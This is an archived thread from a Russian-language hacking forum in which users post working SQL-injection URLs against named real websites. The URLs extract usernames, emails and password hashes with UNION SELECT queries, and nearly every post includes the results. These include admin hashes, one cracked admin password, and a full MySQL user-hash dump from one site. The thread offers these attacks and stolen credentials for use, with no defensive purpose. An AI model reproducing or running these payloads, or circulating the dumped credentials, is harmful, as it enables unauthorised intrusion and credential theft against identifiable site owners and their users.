ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4511  
Старый 15.01.2008, 13:00
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
Smile

Код:
http://www.exmormon.org/boards/w-agora/index.php?site=exmobb&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
debugadmin:d52dee500ff126055ad85eb2ef2a37e4
 
Ответить с цитированием

  #4512  
Старый 15.01.2008, 14:51
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

sportpiac.hu
Код HTML:
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8/*
filemon@localhost:5.0.44-log:sportpiac
Код HTML:
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables/*
- таблици
Код HTML:
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(column_name),2,3,4,5,6,7,8+from+information_schema.columns+limit+1,100/*
- столбци
Код HTML:
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user,0x3a,pass),2,3,4,5,6,7,8+from+users/*
Код HTML:
http://www.sportpiac.hu/index.php?oldal=katalogus&forgalmazo=7+union+select+0,concat(id,0x3a,user_login,0x3a,user_pass),2,3,4,5,6,7,8+from+wp_users/*
Код HTML:
http://www.sportpiac.hu/admin/
1:admin:21232f297a57a5a743894a0e4a801fc3:admin
3:filemon:1a1dc91c907325c69271ddf0c944bc72:pass
 
Ответить с цитированием

  #4513  
Старый 15.01.2008, 15:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.singletrackworld.co.uk/article.php?sid=-16+union+select+1,2,concat_ws(char(58),name,pass,e mail),4,5,6,7,8,9+from+users/*
Проверил по антибояну...там был этот сайт, но только .com....так что не в счет))
-----------------------------------------------------------------------
http://www.digitaltouch.co.uk/article.php?ID=-2+union+select+1,2,3,concat_ws(0x2f,version(),user (),database()),5/*
4.0.27-standard/digitalt_jeffbrf@localhost/digitalt_digitaltouch
-----------------------------------------------------------------------
http://www.atlvalsesiavercelli.it/article.php?id=-1+union+select+CONVERT(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*
4.1.11-Debian_4sarge8-log:atl@localhost:atl_valsesia
 
Ответить с цитированием

  #4514  
Старый 15.01.2008, 19:41
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://www.petsby.com/dogs_list.php?page=1&group_id=-1/**/union/**/select/**/concat_ws(char(124),username,user_password)/**/from/**/forum_users/**/limit/**/1,1/*

Admin|e1df5c96bad252401b022d71f1c83d5e
Вот только не расшифровываеться ((
 
Ответить с цитированием

  #4515  
Старый 16.01.2008, 00:04
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.snami.pisa.it/show_new.php?id=-99+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+users/*
Код:
http://www.ciag.com.gt/show_new.php?id=-6+union+select+1,VERSION(),3,4,5,6,7/*

Последний раз редактировалось SWAT; 16.01.2008 в 00:09..
 
Ответить с цитированием

  #4516  
Старый 16.01.2008, 00:09
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Toxic, http://forum.xakep.ru/m_1024319/printable.htm

Admin:13042006
 
Ответить с цитированием

  #4517  
Старый 16.01.2008, 01:16
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

крупный сайт

http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(user_name,0x3a,user_pass ,0x3a,user_email)+from+groove_user+limit+0,1/*


http://groove.ru/?user=Dana&p=pages&id=-352+union+select+1,concat(admin_name,0x3a,admin_pa ss)+from+groove_admin/*

юзеров больше 24000 шт

_________________________________
секес )))

http://sexsecrets.ru/?r=enciklopedia&id=-176+union+select+1,concat(user_email,0x3a,username ,0x3a,user_password),3+from+phpbb_users+limit+1,1/*

-писюн.ру

http://www.pisun.ru/?price=a&price_max=&sel_metro=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,version(), 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79 ,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,9 6,97,98,99,100,101,102/*

5 мускул

_________________________________

http://www.price-list.kiev.ua/cgi-bin/price_img_info.cgi?id=-3901576+union+select+1,cast(concat(email,0x3a,pass )+as+binary),3,4,5+from+users+limit+0,1/*

_________________________________

видео магазины

http://www.home-dvd.info/details.php?Id=16749+union+select+concat(email,0x3 a,pwd)+from+users+limit+10,10/*


http://www.foxmovies.ru/index.php3?id=-10595+union+select+1,2,3,4,5,concat(nick,0x3a,pass wd),7,8,9+from+_user+limit+0,1/*

_________________________________

туроператор

http://www.mirtour.ru/about/news/?id=-37+union+select+1,2,3,4,concat(manager,0x3a,manage rpass),6,7,8,9+from+discont_managers+limit+2,1/*
 
Ответить с цитированием

  #4518  
Старый 16.01.2008, 02:17
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.samopoznanie.com/printarticle.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5/*
4.0.23a-log/lidia@localhost/samopoznanie
 
Ответить с цитированием

  #4519  
Старый 16.01.2008, 07:59
noneim
Новичок
Регистрация: 28.11.2007
Сообщений: 5
Провел на форуме:
33325

Репутация: 0
По умолчанию

PHP код:
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+group+by+1-- 
PHP код:
http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+or+1=1-- 

Вроде инъёкция есть, но group by, order by, union почему то не работают.. (
 
Ответить с цитированием

  #4520  
Старый 16.01.2008, 09:57
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

evrofasad.com.ua
Код:
http://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,version(),database(),user()),2/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6
4.1.20-community-nt:db_evrofasad_new:evrofasad_user@localhost
Код:
http://www.evrofasad.com.ua/81?printID=-1+union+select+concat_ws(0x3a,user,password),2+from+mysql.user+limit+0,1/*&PHPSESSID=unsbr5mn81q16grk03l43fonh6
Код:
root:*F9412D7E95AC1E517BBDEA70B0CDA1C3A954DBA5
eurofasad:*685A8769F0EFB1A0358699E09AECB47216F2FA60
evrofasad_user:*E594B415CBFCBCBE92DE48810E7442D7E9925964
sofit:*A75C7664FF4013AC928FE355BE7BEE313295EF15
loginforum:*76A5D146549860B09B9BC8C529EDF05D95A96E90
backuper:*759E70BE56B564382083D276339AC5F660332A1C
svetofor:*F185EF1C8A14114439937712A796759943FE4C7D
viknauser:*C9EE7E827518FBB0B6452F32A3A0E74EE4348DA6
dblussole:*8303224CA73F32E099ED4D5589372A48847A4ADC
sofit_forum:*C010E6C07BCD31C8EE45D04093BB1C50A3BE7981
svt:*917B41A42ED3307B057D4462776BE6D22191E471
efplast:*890244829E7E1073887CD3BE4F3DD40ED1AE65CC
delux:*D5876B1B1A4A3233F51317EFA97D9CD60E571AA0
claroline:*6C14E3D8CE32929711BCBB4C2F7CA95EA7B2A221
integral:*6020723CC8C46038FB7E9D29E26E50357695DA69
svitkomfortu:*C0842FED9DED84F798E19B4DFAEAEC1DA180EB38
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656
houses:*7EAE149B76900876ABD03DD1E4281B218A9D47F3
test:*94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
lussoleforum:*40E10559E7BA57D182650F9AFDBFA12084402352
poselok_db_user:*A652F43B1179494CF8ED2EA752C86416540A8041
joomla:*F70658E9BDD2910AC33ACDA164605DFC1DA70A68
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ